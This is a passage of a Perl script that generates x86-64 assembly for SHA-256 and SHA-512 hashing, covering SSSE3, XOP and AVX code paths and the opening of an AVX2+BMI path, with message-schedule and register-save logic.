eval(shift(@insns));
eval(shift(@insns));
&pxor ($t0,$t2);
eval(shift(@insns)); #@
eval(shift(@insns));
eval(shift(@insns));
eval(shift(@insns)); #@
&psrld ($t2,$sigma0[1]-$sigma0[0]);
eval(shift(@insns));
&pxor ($t0,$t1);
eval(shift(@insns));
eval(shift(@insns));
&pslld ($t1,$sigma0[1]-$sigma0[0]);
eval(shift(@insns));
eval(shift(@insns));
&pxor ($t0,$t2);
eval(shift(@insns));
eval(shift(@insns)); #@
&movdqa ($t2,$t3);
eval(shift(@insns));
eval(shift(@insns));
&pxor ($t0,$t1); # sigma0(X[1..4])
eval(shift(@insns)); #@
eval(shift(@insns));
eval(shift(@insns));
&psrld ($t3,$sigma1[2]);
eval(shift(@insns));
eval(shift(@insns));
&paddd (@X[0],$t0); # X[0..3] += sigma0(X[1..4])
eval(shift(@insns)); #@
eval(shift(@insns));
&psrlq ($t2,$sigma1[0]);
eval(shift(@insns));
eval(shift(@insns));
eval(shift(@insns));
&pxor ($t3,$t2);
eval(shift(@insns)); #@
eval(shift(@insns));
eval(shift(@insns));
eval(shift(@insns)); #@
&psrlq ($t2,$sigma1[1]-$sigma1[0]);
eval(shift(@insns));
eval(shift(@insns));
&pxor ($t3,$t2);
eval(shift(@insns)); #@
eval(shift(@insns));
eval(shift(@insns));
#&pshufb ($t3,$t4); # sigma1(X[14..15])
&pshufd ($t3,$t3,0b10000000);
eval(shift(@insns));
eval(shift(@insns));
eval(shift(@insns));
&psrldq ($t3,8);
eval(shift(@insns));
eval(shift(@insns)); #@
eval(shift(@insns));
eval(shift(@insns));
eval(shift(@insns)); #@
&paddd (@X[0],$t3); # X[0..1] += sigma1(X[14..15])
eval(shift(@insns));
eval(shift(@insns));
eval(shift(@insns));
&pshufd ($t3,@X[0],0b01010000); # X[16..17]
eval(shift(@insns));
eval(shift(@insns)); #@
eval(shift(@insns));
&movdqa ($t2,$t3);
eval(shift(@insns));
eval(shift(@insns));
&psrld ($t3,$sigma1[2]);
eval(shift(@insns));
eval(shift(@insns)); #@
&psrlq ($t2,$sigma1[0]);
eval(shift(@insns));
eval(shift(@insns));
&pxor ($t3,$t2);
eval(shift(@insns)); #@
eval(shift(@insns));
eval(shift(@insns));
eval(shift(@insns)); #@
eval(shift(@insns));
&psrlq ($t2,$sigma1[1]-$sigma1[0]);
eval(shift(@insns));
eval(shift(@insns));
eval(shift(@insns));
&pxor ($t3,$t2);
eval(shift(@insns));
eval(shift(@insns));
eval(shift(@insns)); #@
#&pshufb ($t3,$t5);
&pshufd ($t3,$t3,0b00001000);
eval(shift(@insns));
eval(shift(@insns));
&movdqa ($t2,16*2*$j."($Tbl)");
eval(shift(@insns)); #@
eval(shift(@insns));
&pslldq ($t3,8);
eval(shift(@insns));
eval(shift(@insns));
eval(shift(@insns));
&paddd (@X[0],$t3); # X[2..3] += sigma1(X[16..17])
eval(shift(@insns)); #@
eval(shift(@insns));
eval(shift(@insns));
}
&paddd ($t2,@X[0]);
foreach (@insns) { eval; } # remaining instructions
&movdqa (16*$j."(%rsp)",$t2);
}
for ($i=0,$j=0; $j<4; $j++) {
&SSSE3_256_00_47($j,\&body_00_15,@X);
push(@X,shift(@X)); # rotate(@X)
}
&cmpb ($SZ-1+16*2*$SZ."($Tbl)",0);
&jne (".Lssse3_00_47");
for ($i=0; $i<16; ) {
foreach(body_00_15()) { eval; }
}
$code.=<<___;
mov $_ctx,$ctx
mov $a1,$A
add $SZ*0($ctx),$A
lea 16*$SZ($inp),$inp
add $SZ*1($ctx),$B
add $SZ*2($ctx),$C
add $SZ*3($ctx),$D
add $SZ*4($ctx),$E
add $SZ*5($ctx),$F
add $SZ*6($ctx),$G
add $SZ*7($ctx),$H
cmp $_end,$inp
mov $A,$SZ*0($ctx)
mov $B,$SZ*1($ctx)
mov $C,$SZ*2($ctx)
mov $D,$SZ*3($ctx)
mov $E,$SZ*4($ctx)
mov $F,$SZ*5($ctx)
mov $G,$SZ*6($ctx)
mov $H,$SZ*7($ctx)
jb .Lloop_ssse3
mov $_rsp,%rsi
___
$code.=<<___ if ($win64);
movaps 16*$SZ+32(%rsp),%xmm6
movaps 16*$SZ+48(%rsp),%xmm7
movaps 16*$SZ+64(%rsp),%xmm8
movaps 16*$SZ+80(%rsp),%xmm9
___
$code.=<<___;
mov (%rsi),%r15
mov 8(%rsi),%r14
mov 16(%rsi),%r13
mov 24(%rsi),%r12
mov 32(%rsi),%rbp
mov 40(%rsi),%rbx
lea 48(%rsi),%rsp
.Lepilogue_ssse3:
ret
.size ${func}_ssse3,.-${func}_ssse3
___
}
if ($avx) {{
######################################################################
# XOP code path
#
if ($SZ==8) { # SHA512 only
$code.=<<___;
.type ${func}_xop,\@function,3
.align 64
${func}_xop:
.Lxop_shortcut:
push %rbx
push %rbp
push %r12
push %r13
push %r14
push %r15
mov %rsp,%r11 # copy %rsp
shl \$4,%rdx # num*16
sub \$`$framesz+$win64*16*($SZ==4?4:6)`,%rsp
lea ($inp,%rdx,$SZ),%rdx # inp+num*16*$SZ
and \$-64,%rsp # align stack frame
mov $ctx,$_ctx # save ctx, 1st arg
mov $inp,$_inp # save inp, 2nd arh
mov %rdx,$_end # save end pointer, "3rd" arg
mov %r11,$_rsp # save copy of %rsp
___
$code.=<<___ if ($win64);
movaps %xmm6,16*$SZ+32(%rsp)
movaps %xmm7,16*$SZ+48(%rsp)
movaps %xmm8,16*$SZ+64(%rsp)
movaps %xmm9,16*$SZ+80(%rsp)
___
$code.=<<___ if ($win64 && $SZ>4);
movaps %xmm10,16*$SZ+96(%rsp)
movaps %xmm11,16*$SZ+112(%rsp)
___
$code.=<<___;
.Lprologue_xop:
vzeroupper
mov $SZ*0($ctx),$A
mov $SZ*1($ctx),$B
mov $SZ*2($ctx),$C
mov $SZ*3($ctx),$D
mov $SZ*4($ctx),$E
mov $SZ*5($ctx),$F
mov $SZ*6($ctx),$G
mov $SZ*7($ctx),$H
jmp .Lloop_xop
___
if ($SZ==4) { # SHA256
my @X = map("%xmm$_",(0..3));
my ($t0,$t1,$t2,$t3) = map("%xmm$_",(4..7));
$code.=<<___;
.align 16
.Lloop_xop:
vmovdqa $TABLE+`$SZ*2*$rounds`(%rip),$t3
vmovdqu 0x00($inp),@X[0]
vmovdqu 0x10($inp),@X[1]
vmovdqu 0x20($inp),@X[2]
vmovdqu 0x30($inp),@X[3]
vpshufb $t3,@X[0],@X[0]
lea $TABLE(%rip),$Tbl
vpshufb $t3,@X[1],@X[1]
vpshufb $t3,@X[2],@X[2]
vpaddd 0x00($Tbl),@X[0],$t0
vpshufb $t3,@X[3],@X[3]
vpaddd 0x20($Tbl),@X[1],$t1
vpaddd 0x40($Tbl),@X[2],$t2
vpaddd 0x60($Tbl),@X[3],$t3
vmovdqa $t0,0x00(%rsp)
mov $A,$a1
vmovdqa $t1,0x10(%rsp)
mov $B,$a3
vmovdqa $t2,0x20(%rsp)
xor $C,$a3 # magic
vmovdqa $t3,0x30(%rsp)
mov $E,$a0
jmp .Lxop_00_47
.align 16
.Lxop_00_47:
sub \$`-16*2*$SZ`,$Tbl # size optimization
___
sub XOP_256_00_47 () {
my $j = shift;
my $body = shift;
my @X = @_;
my @insns = (&$body,&$body,&$body,&$body); # 104 instructions
&vpalignr ($t0,@X[1],@X[0],$SZ); # X[1..4]
eval(shift(@insns));
eval(shift(@insns));
&vpalignr ($t3,@X[3],@X[2],$SZ); # X[9..12]
eval(shift(@insns));
eval(shift(@insns));
&vprotd ($t1,$t0,8*$SZ-$sigma0[1]);
eval(shift(@insns));
eval(shift(@insns));
&vpsrld ($t0,$t0,$sigma0[2]);
eval(shift(@insns));
eval(shift(@insns));
&vpaddd (@X[0],@X[0],$t3); # X[0..3] += X[9..12]
eval(shift(@insns));
eval(shift(@insns));
eval(shift(@insns));
eval(shift(@insns));
&vprotd ($t2,$t1,$sigma0[1]-$sigma0[0]);
eval(shift(@insns));
eval(shift(@insns));
&vpxor ($t0,$t0,$t1);
eval(shift(@insns));
eval(shift(@insns));
eval(shift(@insns));
eval(shift(@insns));
&vprotd ($t3,@X[3],8*$SZ-$sigma1[1]);
eval(shift(@insns));
eval(shift(@insns));
&vpxor ($t0,$t0,$t2); # sigma0(X[1..4])
eval(shift(@insns));
eval(shift(@insns));
&vpsrld ($t2,@X[3],$sigma1[2]);
eval(shift(@insns));
eval(shift(@insns));
&vpaddd (@X[0],@X[0],$t0); # X[0..3] += sigma0(X[1..4])
eval(shift(@insns));
eval(shift(@insns));
&vprotd ($t1,$t3,$sigma1[1]-$sigma1[0]);
eval(shift(@insns));
eval(shift(@insns));
&vpxor ($t3,$t3,$t2);
eval(shift(@insns));
eval(shift(@insns));
eval(shift(@insns));
eval(shift(@insns));
&vpxor ($t3,$t3,$t1); # sigma1(X[14..15])
eval(shift(@insns));
eval(shift(@insns));
eval(shift(@insns));
eval(shift(@insns));
&vpsrldq ($t3,$t3,8);
eval(shift(@insns));
eval(shift(@insns));
eval(shift(@insns));
eval(shift(@insns));
&vpaddd (@X[0],@X[0],$t3); # X[0..1] += sigma1(X[14..15])
eval(shift(@insns));
eval(shift(@insns));
eval(shift(@insns));
eval(shift(@insns));
&vprotd ($t3,@X[0],8*$SZ-$sigma1[1]);
eval(shift(@insns));
eval(shift(@insns));
&vpsrld ($t2,@X[0],$sigma1[2]);
eval(shift(@insns));
eval(shift(@insns));
&vprotd ($t1,$t3,$sigma1[1]-$sigma1[0]);
eval(shift(@insns));
eval(shift(@insns));
&vpxor ($t3,$t3,$t2);
eval(shift(@insns));
eval(shift(@insns));
eval(shift(@insns));
eval(shift(@insns));
&vpxor ($t3,$t3,$t1); # sigma1(X[16..17])
eval(shift(@insns));
eval(shift(@insns));
eval(shift(@insns));
eval(shift(@insns));
&vpslldq ($t3,$t3,8); # 22 instructions
eval(shift(@insns));
eval(shift(@insns));
eval(shift(@insns));
eval(shift(@insns));
&vpaddd (@X[0],@X[0],$t3); # X[2..3] += sigma1(X[16..17])
eval(shift(@insns));
eval(shift(@insns));
eval(shift(@insns));
eval(shift(@insns));
&vpaddd ($t2,@X[0],16*2*$j."($Tbl)");
foreach (@insns) { eval; } # remaining instructions
&vmovdqa (16*$j."(%rsp)",$t2);
}
for ($i=0,$j=0; $j<4; $j++) {
&XOP_256_00_47($j,\&body_00_15,@X);
push(@X,shift(@X)); # rotate(@X)
}
&cmpb ($SZ-1+16*2*$SZ."($Tbl)",0);
&jne (".Lxop_00_47");
for ($i=0; $i<16; ) {
foreach(body_00_15()) { eval; }
}
} else { # SHA512
my @X = map("%xmm$_",(0..7));
my ($t0,$t1,$t2,$t3) = map("%xmm$_",(8..11));
$code.=<<___;
.align 16
.Lloop_xop:
vmovdqa $TABLE+`$SZ*2*$rounds`(%rip),$t3
vmovdqu 0x00($inp),@X[0]
lea $TABLE+0x80(%rip),$Tbl # size optimization
vmovdqu 0x10($inp),@X[1]
vmovdqu 0x20($inp),@X[2]
vpshufb $t3,@X[0],@X[0]
vmovdqu 0x30($inp),@X[3]
vpshufb $t3,@X[1],@X[1]
vmovdqu 0x40($inp),@X[4]
vpshufb $t3,@X[2],@X[2]
vmovdqu 0x50($inp),@X[5]
vpshufb $t3,@X[3],@X[3]
vmovdqu 0x60($inp),@X[6]
vpshufb $t3,@X[4],@X[4]
vmovdqu 0x70($inp),@X[7]
vpshufb $t3,@X[5],@X[5]
vpaddq -0x80($Tbl),@X[0],$t0
vpshufb $t3,@X[6],@X[6]
vpaddq -0x60($Tbl),@X[1],$t1
vpshufb $t3,@X[7],@X[7]
vpaddq -0x40($Tbl),@X[2],$t2
vpaddq -0x20($Tbl),@X[3],$t3
vmovdqa $t0,0x00(%rsp)
vpaddq 0x00($Tbl),@X[4],$t0
vmovdqa $t1,0x10(%rsp)
vpaddq 0x20($Tbl),@X[5],$t1
vmovdqa $t2,0x20(%rsp)
vpaddq 0x40($Tbl),@X[6],$t2
vmovdqa $t3,0x30(%rsp)
vpaddq 0x60($Tbl),@X[7],$t3
vmovdqa $t0,0x40(%rsp)
mov $A,$a1
vmovdqa $t1,0x50(%rsp)
mov $B,$a3
vmovdqa $t2,0x60(%rsp)
xor $C,$a3 # magic
vmovdqa $t3,0x70(%rsp)
mov $E,$a0
jmp .Lxop_00_47
.align 16
.Lxop_00_47:
add \$`16*2*$SZ`,$Tbl
___
sub XOP_512_00_47 () {
my $j = shift;
my $body = shift;
my @X = @_;
my @insns = (&$body,&$body); # 52 instructions
&vpalignr ($t0,@X[1],@X[0],$SZ); # X[1..2]
eval(shift(@insns));
eval(shift(@insns));
&vpalignr ($t3,@X[5],@X[4],$SZ); # X[9..10]
eval(shift(@insns));
eval(shift(@insns));
&vprotq ($t1,$t0,8*$SZ-$sigma0[1]);
eval(shift(@insns));
eval(shift(@insns));
&vpsrlq ($t0,$t0,$sigma0[2]);
eval(shift(@insns));
eval(shift(@insns));
&vpaddq (@X[0],@X[0],$t3); # X[0..1] += X[9..10]
eval(shift(@insns));
eval(shift(@insns));
eval(shift(@insns));
eval(shift(@insns));
&vprotq ($t2,$t1,$sigma0[1]-$sigma0[0]);
eval(shift(@insns));
eval(shift(@insns));
&vpxor ($t0,$t0,$t1);
eval(shift(@insns));
eval(shift(@insns));
eval(shift(@insns));
eval(shift(@insns));
&vprotq ($t3,@X[7],8*$SZ-$sigma1[1]);
eval(shift(@insns));
eval(shift(@insns));
&vpxor ($t0,$t0,$t2); # sigma0(X[1..2])
eval(shift(@insns));
eval(shift(@insns));
&vpsrlq ($t2,@X[7],$sigma1[2]);
eval(shift(@insns));
eval(shift(@insns));
&vpaddq (@X[0],@X[0],$t0); # X[0..1] += sigma0(X[1..2])
eval(shift(@insns));
eval(shift(@insns));
&vprotq ($t1,$t3,$sigma1[1]-$sigma1[0]);
eval(shift(@insns));
eval(shift(@insns));
&vpxor ($t3,$t3,$t2);
eval(shift(@insns));
eval(shift(@insns));
eval(shift(@insns));
eval(shift(@insns));
&vpxor ($t3,$t3,$t1); # sigma1(X[14..15])
eval(shift(@insns));
eval(shift(@insns));
eval(shift(@insns));
eval(shift(@insns));
&vpaddq (@X[0],@X[0],$t3); # X[0..1] += sigma1(X[14..15])
eval(shift(@insns));
eval(shift(@insns));
eval(shift(@insns));
eval(shift(@insns));
&vpaddq ($t2,@X[0],16*2*$j-0x80."($Tbl)");
foreach (@insns) { eval; } # remaining instructions
&vmovdqa (16*$j."(%rsp)",$t2);
}
for ($i=0,$j=0; $j<8; $j++) {
&XOP_512_00_47($j,\&body_00_15,@X);
push(@X,shift(@X)); # rotate(@X)
}
&cmpb ($SZ-1+16*2*$SZ-0x80."($Tbl)",0);
&jne (".Lxop_00_47");
for ($i=0; $i<16; ) {
foreach(body_00_15()) { eval; }
}
}
$code.=<<___;
mov $_ctx,$ctx
mov $a1,$A
add $SZ*0($ctx),$A
lea 16*$SZ($inp),$inp
add $SZ*1($ctx),$B
add $SZ*2($ctx),$C
add $SZ*3($ctx),$D
add $SZ*4($ctx),$E
add $SZ*5($ctx),$F
add $SZ*6($ctx),$G
add $SZ*7($ctx),$H
cmp $_end,$inp
mov $A,$SZ*0($ctx)
mov $B,$SZ*1($ctx)
mov $C,$SZ*2($ctx)
mov $D,$SZ*3($ctx)
mov $E,$SZ*4($ctx)
mov $F,$SZ*5($ctx)
mov $G,$SZ*6($ctx)
mov $H,$SZ*7($ctx)
jb .Lloop_xop
mov $_rsp,%rsi
vzeroupper
___
$code.=<<___ if ($win64);
movaps 16*$SZ+32(%rsp),%xmm6
movaps 16*$SZ+48(%rsp),%xmm7
movaps 16*$SZ+64(%rsp),%xmm8
movaps 16*$SZ+80(%rsp),%xmm9
___
$code.=<<___ if ($win64 && $SZ>4);
movaps 16*$SZ+96(%rsp),%xmm10
movaps 16*$SZ+112(%rsp),%xmm11
___
$code.=<<___;
mov (%rsi),%r15
mov 8(%rsi),%r14
mov 16(%rsi),%r13
mov 24(%rsi),%r12
mov 32(%rsi),%rbp
mov 40(%rsi),%rbx
lea 48(%rsi),%rsp
.Lepilogue_xop:
ret
.size ${func}_xop,.-${func}_xop
___
}
######################################################################
# AVX+shrd code path
#
local *ror = sub { &shrd(@_[0],@_) };
$code.=<<___;
.type ${func}_avx,\@function,3
.align 64
${func}_avx:
.Lavx_shortcut:
push %rbx
push %rbp
push %r12
push %r13
push %r14
push %r15
mov %rsp,%r11 # copy %rsp
shl \$4,%rdx # num*16
sub \$`$framesz+$win64*16*($SZ==4?4:6)`,%rsp
lea ($inp,%rdx,$SZ),%rdx # inp+num*16*$SZ
and \$-64,%rsp # align stack frame
mov $ctx,$_ctx # save ctx, 1st arg
mov $inp,$_inp # save inp, 2nd arh
mov %rdx,$_end # save end pointer, "3rd" arg
mov %r11,$_rsp # save copy of %rsp
___
$code.=<<___ if ($win64);
movaps %xmm6,16*$SZ+32(%rsp)
movaps %xmm7,16*$SZ+48(%rsp)
movaps %xmm8,16*$SZ+64(%rsp)
movaps %xmm9,16*$SZ+80(%rsp)
___
$code.=<<___ if ($win64 && $SZ>4);
movaps %xmm10,16*$SZ+96(%rsp)
movaps %xmm11,16*$SZ+112(%rsp)
___
$code.=<<___;
.Lprologue_avx:
vzeroupper
mov $SZ*0($ctx),$A
mov $SZ*1($ctx),$B
mov $SZ*2($ctx),$C
mov $SZ*3($ctx),$D
mov $SZ*4($ctx),$E
mov $SZ*5($ctx),$F
mov $SZ*6($ctx),$G
mov $SZ*7($ctx),$H
___
if ($SZ==4) { # SHA256
my @X = map("%xmm$_",(0..3));
my ($t0,$t1,$t2,$t3, $t4,$t5) = map("%xmm$_",(4..9));
$code.=<<___;
vmovdqa $TABLE+`$SZ*2*$rounds`+32(%rip),$t4
vmovdqa $TABLE+`$SZ*2*$rounds`+64(%rip),$t5
jmp .Lloop_avx
.align 16
.Lloop_avx:
vmovdqa $TABLE+`$SZ*2*$rounds`(%rip),$t3
vmovdqu 0x00($inp),@X[0]
vmovdqu 0x10($inp),@X[1]
vmovdqu 0x20($inp),@X[2]
vmovdqu 0x30($inp),@X[3]
vpshufb $t3,@X[0],@X[0]
lea $TABLE(%rip),$Tbl
vpshufb $t3,@X[1],@X[1]
vpshufb $t3,@X[2],@X[2]
vpaddd 0x00($Tbl),@X[0],$t0
vpshufb $t3,@X[3],@X[3]
vpaddd 0x20($Tbl),@X[1],$t1
vpaddd 0x40($Tbl),@X[2],$t2
vpaddd 0x60($Tbl),@X[3],$t3
vmovdqa $t0,0x00(%rsp)
mov $A,$a1
vmovdqa $t1,0x10(%rsp)
mov $B,$a3
vmovdqa $t2,0x20(%rsp)
xor $C,$a3 # magic
vmovdqa $t3,0x30(%rsp)
mov $E,$a0
jmp .Lavx_00_47
.align 16
.Lavx_00_47:
sub \$`-16*2*$SZ`,$Tbl # size optimization
___
sub Xupdate_256_AVX () {
(
'&vpalignr ($t0,@X[1],@X[0],$SZ)', # X[1..4]
'&vpalignr ($t3,@X[3],@X[2],$SZ)', # X[9..12]
'&vpsrld ($t2,$t0,$sigma0[0]);',
'&vpaddd (@X[0],@X[0],$t3)', # X[0..3] += X[9..12]
'&vpsrld ($t3,$t0,$sigma0[2])',
'&vpslld ($t1,$t0,8*$SZ-$sigma0[1]);',
'&vpxor ($t0,$t3,$t2)',
'&vpshufd ($t3,@X[3],0b11111010)',# X[14..15]
'&vpsrld ($t2,$t2,$sigma0[1]-$sigma0[0]);',
'&vpxor ($t0,$t0,$t1)',
'&vpslld ($t1,$t1,$sigma0[1]-$sigma0[0]);',
'&vpxor ($t0,$t0,$t2)',
'&vpsrld ($t2,$t3,$sigma1[2]);',
'&vpxor ($t0,$t0,$t1)', # sigma0(X[1..4])
'&vpsrlq ($t3,$t3,$sigma1[0]);',
'&vpaddd (@X[0],@X[0],$t0)', # X[0..3] += sigma0(X[1..4])
'&vpxor ($t2,$t2,$t3);',
'&vpsrlq ($t3,$t3,$sigma1[1]-$sigma1[0])',
'&vpxor ($t2,$t2,$t3)',
'&vpshufb ($t2,$t2,$t4)', # sigma1(X[14..15])
'&vpaddd (@X[0],@X[0],$t2)', # X[0..1] += sigma1(X[14..15])
'&vpshufd ($t3,@X[0],0b01010000)',# X[16..17]
'&vpsrld ($t2,$t3,$sigma1[2])',
'&vpsrlq ($t3,$t3,$sigma1[0])',
'&vpxor ($t2,$t2,$t3);',
'&vpsrlq ($t3,$t3,$sigma1[1]-$sigma1[0])',
'&vpxor ($t2,$t2,$t3)',
'&vpshufb ($t2,$t2,$t5)',
'&vpaddd (@X[0],@X[0],$t2)' # X[2..3] += sigma1(X[16..17])
);
}
sub AVX_256_00_47 () {
my $j = shift;
my $body = shift;
my @X = @_;
my @insns = (&$body,&$body,&$body,&$body); # 104 instructions
foreach (Xupdate_256_AVX()) { # 29 instructions
eval;
eval(shift(@insns));
eval(shift(@insns));
eval(shift(@insns));
}
&vpaddd ($t2,@X[0],16*2*$j."($Tbl)");
foreach (@insns) { eval; } # remaining instructions
&vmovdqa (16*$j."(%rsp)",$t2);
}
for ($i=0,$j=0; $j<4; $j++) {
&AVX_256_00_47($j,\&body_00_15,@X);
push(@X,shift(@X)); # rotate(@X)
}
&cmpb ($SZ-1+16*2*$SZ."($Tbl)",0);
&jne (".Lavx_00_47");
for ($i=0; $i<16; ) {
foreach(body_00_15()) { eval; }
}
} else { # SHA512
my @X = map("%xmm$_",(0..7));
my ($t0,$t1,$t2,$t3) = map("%xmm$_",(8..11));
$code.=<<___;
jmp .Lloop_avx
.align 16
.Lloop_avx:
vmovdqa $TABLE+`$SZ*2*$rounds`(%rip),$t3
vmovdqu 0x00($inp),@X[0]
lea $TABLE+0x80(%rip),$Tbl # size optimization
vmovdqu 0x10($inp),@X[1]
vmovdqu 0x20($inp),@X[2]
vpshufb $t3,@X[0],@X[0]
vmovdqu 0x30($inp),@X[3]
vpshufb $t3,@X[1],@X[1]
vmovdqu 0x40($inp),@X[4]
vpshufb $t3,@X[2],@X[2]
vmovdqu 0x50($inp),@X[5]
vpshufb $t3,@X[3],@X[3]
vmovdqu 0x60($inp),@X[6]
vpshufb $t3,@X[4],@X[4]
vmovdqu 0x70($inp),@X[7]
vpshufb $t3,@X[5],@X[5]
vpaddq -0x80($Tbl),@X[0],$t0
vpshufb $t3,@X[6],@X[6]
vpaddq -0x60($Tbl),@X[1],$t1
vpshufb $t3,@X[7],@X[7]
vpaddq -0x40($Tbl),@X[2],$t2
vpaddq -0x20($Tbl),@X[3],$t3
vmovdqa $t0,0x00(%rsp)
vpaddq 0x00($Tbl),@X[4],$t0
vmovdqa $t1,0x10(%rsp)
vpaddq 0x20($Tbl),@X[5],$t1
vmovdqa $t2,0x20(%rsp)
vpaddq 0x40($Tbl),@X[6],$t2
vmovdqa $t3,0x30(%rsp)
vpaddq 0x60($Tbl),@X[7],$t3
vmovdqa $t0,0x40(%rsp)
mov $A,$a1
vmovdqa $t1,0x50(%rsp)
mov $B,$a3
vmovdqa $t2,0x60(%rsp)
xor $C,$a3 # magic
vmovdqa $t3,0x70(%rsp)
mov $E,$a0
jmp .Lavx_00_47
.align 16
.Lavx_00_47:
add \$`16*2*$SZ`,$Tbl
___
sub Xupdate_512_AVX () {
(
'&vpalignr ($t0,@X[1],@X[0],$SZ)', # X[1..2]
'&vpalignr ($t3,@X[5],@X[4],$SZ)', # X[9..10]
'&vpsrlq ($t2,$t0,$sigma0[0])',
'&vpaddq (@X[0],@X[0],$t3);', # X[0..1] += X[9..10]
'&vpsrlq ($t3,$t0,$sigma0[2])',
'&vpsllq ($t1,$t0,8*$SZ-$sigma0[1]);',
'&vpxor ($t0,$t3,$t2)',
'&vpsrlq ($t2,$t2,$sigma0[1]-$sigma0[0]);',
'&vpxor ($t0,$t0,$t1)',
'&vpsllq ($t1,$t1,$sigma0[1]-$sigma0[0]);',
'&vpxor ($t0,$t0,$t2)',
'&vpsrlq ($t3,@X[7],$sigma1[2]);',
'&vpxor ($t0,$t0,$t1)', # sigma0(X[1..2])
'&vpsllq ($t2,@X[7],8*$SZ-$sigma1[1]);',
'&vpaddq (@X[0],@X[0],$t0)', # X[0..1] += sigma0(X[1..2])
'&vpsrlq ($t1,@X[7],$sigma1[0]);',
'&vpxor ($t3,$t3,$t2)',
'&vpsllq ($t2,$t2,$sigma1[1]-$sigma1[0]);',
'&vpxor ($t3,$t3,$t1)',
'&vpsrlq ($t1,$t1,$sigma1[1]-$sigma1[0]);',
'&vpxor ($t3,$t3,$t2)',
'&vpxor ($t3,$t3,$t1)', # sigma1(X[14..15])
'&vpaddq (@X[0],@X[0],$t3)', # X[0..1] += sigma1(X[14..15])
);
}
sub AVX_512_00_47 () {
my $j = shift;
my $body = shift;
my @X = @_;
my @insns = (&$body,&$body); # 52 instructions
foreach (Xupdate_512_AVX()) { # 23 instructions
eval;
eval(shift(@insns));
eval(shift(@insns));
}
&vpaddq ($t2,@X[0],16*2*$j-0x80."($Tbl)");
foreach (@insns) { eval; } # remaining instructions
&vmovdqa (16*$j."(%rsp)",$t2);
}
for ($i=0,$j=0; $j<8; $j++) {
&AVX_512_00_47($j,\&body_00_15,@X);
push(@X,shift(@X)); # rotate(@X)
}
&cmpb ($SZ-1+16*2*$SZ-0x80."($Tbl)",0);
&jne (".Lavx_00_47");
for ($i=0; $i<16; ) {
foreach(body_00_15()) { eval; }
}
}
$code.=<<___;
mov $_ctx,$ctx
mov $a1,$A
add $SZ*0($ctx),$A
lea 16*$SZ($inp),$inp
add $SZ*1($ctx),$B
add $SZ*2($ctx),$C
add $SZ*3($ctx),$D
add $SZ*4($ctx),$E
add $SZ*5($ctx),$F
add $SZ*6($ctx),$G
add $SZ*7($ctx),$H
cmp $_end,$inp
mov $A,$SZ*0($ctx)
mov $B,$SZ*1($ctx)
mov $C,$SZ*2($ctx)
mov $D,$SZ*3($ctx)
mov $E,$SZ*4($ctx)
mov $F,$SZ*5($ctx)
mov $G,$SZ*6($ctx)
mov $H,$SZ*7($ctx)
jb .Lloop_avx
mov $_rsp,%rsi
vzeroupper
___
$code.=<<___ if ($win64);
movaps 16*$SZ+32(%rsp),%xmm6
movaps 16*$SZ+48(%rsp),%xmm7
movaps 16*$SZ+64(%rsp),%xmm8
movaps 16*$SZ+80(%rsp),%xmm9
___
$code.=<<___ if ($win64 && $SZ>4);
movaps 16*$SZ+96(%rsp),%xmm10
movaps 16*$SZ+112(%rsp),%xmm11
___
$code.=<<___;
mov (%rsi),%r15
mov 8(%rsi),%r14
mov 16(%rsi),%r13
mov 24(%rsi),%r12
mov 32(%rsi),%rbp
mov 40(%rsi),%rbx
lea 48(%rsi),%rsp
.Lepilogue_avx:
ret
.size ${func}_avx,.-${func}_avx
___
if ($avx>1) {{
######################################################################
# AVX2+BMI code path
#
my $a5=$SZ==4?"%esi":"%rsi"; # zap $inp
my $PUSH8=8*2*$SZ;
use integer;
sub bodyx_00_15 () {
# at start $a1 should be zero, $a3 - $b^$c and $a4 copy of $f
(
'($a,$b,$c,$d,$e,$f,$g,$h)=@ROT;'.
'&add ($h,(32*($i/(16/$SZ))+$SZ*($i%(16/$SZ)))%$PUSH8.$base)', # h+=X[i]+K[i]
'&and ($a4,$e)', # f&e
'&rorx ($a0,$e,$Sigma1[2])',
'&rorx ($a2,$e,$Sigma1[1])',
'&lea ($a,"($a,$a1)")', # h+=Sigma0(a) from the past
'&lea ($h,"($h,$a4)")',
'&andn ($a4,$e,$g)', # ~e&g
'&xor ($a0,$a2)',
'&rorx ($a1,$e,$Sigma1[0])',
'&lea ($h,"($h,$a4)")', # h+=Ch(e,f,g)=(e&f)+(~e&g)
'&xor ($a0,$a1)', # Sigma1(e)
'&mov ($a2,$a)',
'&rorx ($a4,$a,$Sigma0[2])',
'&lea ($h,"($h,$a0)")', # h+=Sigma1(e)
'&xor ($a2,$b)', # a^b, b^c in next round
'&rorx ($a1,$a,$Sigma0[1])',
'&rorx ($a0,$a,$Sigma0[0])',
'&lea ($d,"($d,$h)")', # d+=h
'&and ($a3,$a2)', # (b^c)&(a^b)
'&xor ($a1,$a4)',
'&xor ($a3,$b)', # Maj(a,b,c)=Ch(a^b,c,b)
'&xor ($a1,$a0)', # Sigma0(a)
'&lea ($h,"($h,$a3)");'. # h+=Maj(a,b,c)
'&mov ($a4,$e)', # copy of f in future
'($a2,$a3) = ($a3,$a2); unshift(@ROT,pop(@ROT)); $i++;'
);
# and at the finish one has to $a+=$a1
}
$code.=<<___;
.type ${func}_avx2,\@function,3
.align 64
${func}_avx2:
.Lavx2_shortcut:
push %rbx
push %rbp
push %r12
push %r13
push %r14
push %r15
mov %rsp,%r11 # copy %rsp
sub \$`2*$SZ*$rounds+4*8+$win64*16*($SZ==4?4:6)`,%rsp
shl \$4,%rdx # num*16
and \$-256*$SZ,%rsp # align stack frame
lea ($inp,%rdx,$SZ),%rdx # inp+num*16*$SZ
add \$`2*$SZ*($rounds-8)`,%rsp
mov $ctx,$_ctx # save ctx, 1st arg
mov $inp,$_inp # save inp, 2nd arh
mov %rdx,$_end # save end pointer, "3rd" arg
mov %r11,$_rsp # save copy of %rsp
___
$code.=<<___ if ($win64);
movaps %xmm6,16*$SZ+32(%rsp)
movaps %xmm7,16*$SZ+48(%rsp)
movaps %xmm8,16*$SZ+64(%rsp)
movaps %xmm9,16*$SZ+80(%rsp)
___
$code.=<<___ if ($win64 && $SZ>4);
movaps %xmm10,16*$SZ+96(%rsp)
movaps %xmm11,16*$SZ+112(%rsp)
___
$code.=<<___;
.Lprologue_avx2:
vzeroupper
sub \$-16*$SZ,$inp # inp++, size optimization
mov $SZ*0($ctx),$A
mov $inp,%r12 # borrow $T1
mov $SZ*1($ctx),$B
cmp %rdx,$inp # $_end
mov $SZ*2($ctx),$C
cmove %rsp,%r12 # next block or random data
mov $SZ*3($ctx),$D
mov $SZ*4($ctx),$E
